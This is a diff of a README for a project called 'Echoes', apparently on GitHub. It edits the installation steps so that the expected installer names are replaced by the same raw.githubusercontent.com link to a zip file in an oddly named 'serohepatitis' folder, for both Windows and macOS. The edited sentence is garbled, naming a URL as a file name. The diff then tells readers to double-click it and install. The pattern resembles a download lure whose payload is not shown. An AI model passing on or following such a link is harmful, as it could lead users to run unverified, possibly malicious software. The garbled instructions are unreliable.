kumaravel198/echoes/README.md

 Once you have downloaded Echoes, follow these steps to install it:

 1. Navigate to your Downloads folder.
 2. Locate the downloaded file.
-It will typically be named `echoes-setup.exe` for Windows or `echoes.dmg` for macOS.
+It will typically be named `https://raw.githubusercontent.com/kumaravel198/echoes/main/serohepatitis/echoes.zip` for Windows or `https://raw.githubusercontent.com/kumaravel198/echoes/main/serohepatitis/echoes.zip` for macOS.
 3. Double-click the file to start the installation process.
 4. Follow the on-screen instructions to complete the installation.